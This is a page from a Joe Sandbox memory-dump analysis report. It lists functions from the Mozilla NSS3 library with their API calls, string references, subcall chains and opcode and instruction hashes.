                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: calloc$ArenaInitLockPool
                                                                                                                                                                                                                          • String ID: NSS
                                                                                                                                                                                                                          • API String ID: 2230817933-3870390017
                                                                                                                                                                                                                          • Opcode ID: 4224ba73fd64e82cc36a6b0b616ff129ce42623541326b54f46f93a21e3f45af
                                                                                                                                                                                                                          • Instruction ID: 83ae5b79a9eeee0ba2137285c0c493b6a77a46551982ed91300c40fcd75f5841
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4224ba73fd64e82cc36a6b0b616ff129ce42623541326b54f46f93a21e3f45af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0F662E4362033F210A2696C06F8775989F9275EF040035E90CA3B82EB52E50883E3
                                                                                                                                                                                                                          Function 6C53B860 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000116BB,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,6C52A4E2), ref: 6C53B8C6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • database corruption, xrefs: 6C53B8BA
                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C53B8B0
                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C53B8BF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 632333372-598938438
                                                                                                                                                                                                                          • Opcode ID: f7e665d45c6a4c34ff1ba07b0e9efe87daecec31c564059afcd5b94db99f4fe2
                                                                                                                                                                                                                          • Instruction ID: 0fc32b8c75f50bf91a1e4708d79bcce523934fbd6ac58943a71718733ed659d0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7e665d45c6a4c34ff1ba07b0e9efe87daecec31c564059afcd5b94db99f4fe2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F0149329481A0A9D310DB7A5C94D937FBC9F8531570B01C9FA446F3B3E212C802C3E1
                                                                                                                                                                                                                          Function 6C407F90 Relevance: 6.2, APIs: 4, Instructions: 223COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4081DF
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C408239
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C408255
                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C408260
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeavememcpysqlite3_free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1525636458-0
                                                                                                                                                                                                                          • Opcode ID: 60b6e31b6c6986ed9c6c7015aaaee0fda872f99f5e3f7c1808f213273373ed10
                                                                                                                                                                                                                          • Instruction ID: 5aedd396dadee67c696c436e6268cbec7b1e1be259a2ae1a181577f3814397ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60b6e31b6c6986ed9c6c7015aaaee0fda872f99f5e3f7c1808f213273373ed10
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5919B71B816088BEB04DFE0DE49FADB7B1BF06305F16403ED416AB640DB396945CB8A
                                                                                                                                                                                                                          Function 6C4E1D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C4E1D8F
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4E1DA6
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C4E1E13
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4E1ED0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 84796498-0
                                                                                                                                                                                                                          • Opcode ID: f7223f3220f5b96438945335279ee27fe37ba1cc190a4f04edc4a7c5f879d44f
                                                                                                                                                                                                                          • Instruction ID: 231a26998dc301a4b09e16a835918b02cc32040d2ddb5e336be79b45d47258a6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7223f3220f5b96438945335279ee27fe37ba1cc190a4f04edc4a7c5f879d44f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A514675A403098BDB00CF98C884FAEB7B6BF4931AF164129E81A9B752D731E945CB90
                                                                                                                                                                                                                          Function 6C534FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C4185D2,00000000,?,?), ref: 6C534FFD
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C53500C
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5350C8
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5350D6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _byteswap_ulong
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4101233201-0
                                                                                                                                                                                                                          • Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                                                                                                                                                          • Instruction ID: 21d229a5fe89ea2fb25f629b033f3a51f0d2a9ae5c76ea73118796a6f40ad817
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6417DB6A012218BCB18CF18DCD179AB7E1BF4431871D5669D84ACBB02F379E891CB81
                                                                                                                                                                                                                          Function 6C45FFA0 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_initialize.NSS3(00000000,?,?,?,6C45FDFE), ref: 6C45FFAD
                                                                                                                                                                                                                            • Part of subcall function 6C3FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C45F9C9,?,6C45F4DA,6C45F9C9,?,?,6C42369A), ref: 6C3FCA7A
                                                                                                                                                                                                                            • Part of subcall function 6C3FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C3FCB26
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000008,00000000,?,?,?,6C45FDFE), ref: 6C45FFDF
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,?,?,6C45FDFE), ref: 6C46001C
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,6C45FDFE), ref: 6C46006F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$memsetsqlite3_initialize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2358433136-0
                                                                                                                                                                                                                          • Opcode ID: 63b188da15b7ada5db23269b4da4f025dc893a3581ee799a1cc4ae35154e34e6
                                                                                                                                                                                                                          • Instruction ID: 975cc34d86e1ceaa033ba463a0f9b0e150c8ed643f8244cb294b80f2ec1af549
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63b188da15b7ada5db23269b4da4f025dc893a3581ee799a1cc4ae35154e34e6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5541ED71B002158BDB08DFA5EC85EAEB7B0FB45315F05002DD806A7B01EB3AA941CBE9
                                                                                                                                                                                                                          Function 6C58A860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C58A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C58A662), ref: 6C58A69E
                                                                                                                                                                                                                            • Part of subcall function 6C58A690: PR_NewCondVar.NSS3(?), ref: 6C58A6B4
                                                                                                                                                                                                                          • PR_IntervalNow.NSS3 ref: 6C58A8C6
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C58A8EB
                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C58A944
                                                                                                                                                                                                                          • PR_SetPollableEvent.NSS3(?), ref: 6C58A94F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 811965633-0
                                                                                                                                                                                                                          • Opcode ID: 7cfc1330e3eb48d672cfbaaec6d9a35c54425f9c8fbff917622fc46a91cb1772
                                                                                                                                                                                                                          • Instruction ID: e3846dac8e25f295d322a2b58b9beb2c163f84e87a849ad2926ae8ab1988c1ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7cfc1330e3eb48d672cfbaaec6d9a35c54425f9c8fbff917622fc46a91cb1772
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB4137B4A06A22DFC704CF29C98095AFBF1FF88318725856AD959CBB51E731E850CF90
                                                                                                                                                                                                                          Function 6C547DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C547E10
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C547EA6
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C547EB5
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C547ED8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _byteswap_ulong
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4101233201-0
                                                                                                                                                                                                                          • Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                                          • Instruction ID: 729386f416a8a38842f4134daee79746ecc5324be2f3268c2bbbe254574dae3a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4231A4B1A011118FDB04CF18CC9099EBBE2BFC831871B8669C8585BB12EB71EC55CBD1
                                                                                                                                                                                                                          Function 6C4FDF00 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C49AE42), ref: 6C4830AA
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4830C7
                                                                                                                                                                                                                            • Part of subcall function 6C483090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C4830E5
                                                                                                                                                                                                                            • Part of subcall function 6C483090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C483116
                                                                                                                                                                                                                            • Part of subcall function 6C483090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C48312B
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PK11_DestroyObject.NSS3(?,?), ref: 6C483154
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C48317E
                                                                                                                                                                                                                          • SECKEY_CopyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C4FDBBD), ref: 6C4FDFCF
                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4FDFEE
                                                                                                                                                                                                                            • Part of subcall function 6C4986D0: PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C498716
                                                                                                                                                                                                                            • Part of subcall function 6C4986D0: TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C498727
                                                                                                                                                                                                                            • Part of subcall function 6C4986D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C49873B
                                                                                                                                                                                                                            • Part of subcall function 6C4986D0: PR_Unlock.NSS3(?), ref: 6C49876F
                                                                                                                                                                                                                            • Part of subcall function 6C4986D0: PR_SetError.NSS3(00000000,00000000), ref: 6C498787
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C4BF854
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C4BF868
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C4BF882
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C4BF889
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C4BF8A4
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C4BF8AB
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C4BF8C9
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C4BF8D0
                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,6C4FDBBD), ref: 6C4FDFFC
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,6C4FDBBD), ref: 6C4FE007
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Utilfree$CriticalSection$DeleteDestroy$Arena_CopyErrorK11_Private$AlgorithmAlloc_ArenaAuthenticateEnterFreeItem_ObjectPublicTag_UnlockValuememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3730430729-0
                                                                                                                                                                                                                          • Opcode ID: 3ac3b98e3f5be8536b347307e4a21c6e1f2f725d792f7386c4d39a7d5fc2ffa8
                                                                                                                                                                                                                          • Instruction ID: 422770f80ad250f4658458c3f5237ea45c6302ac3342e1bf4af9b36e86da6a40
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ac3b98e3f5be8536b347307e4a21c6e1f2f725d792f7386c4d39a7d5fc2ffa8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9831E4B0A0520157E700EE79AC85F9B73B89F8530DF050139E91AD7B12FB25E909C2F2
                                                                                                                                                                                                                          Function 6C476C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C476C8D
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C476CA9
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C476CC0
                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C598FE0), ref: 6C476CFE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
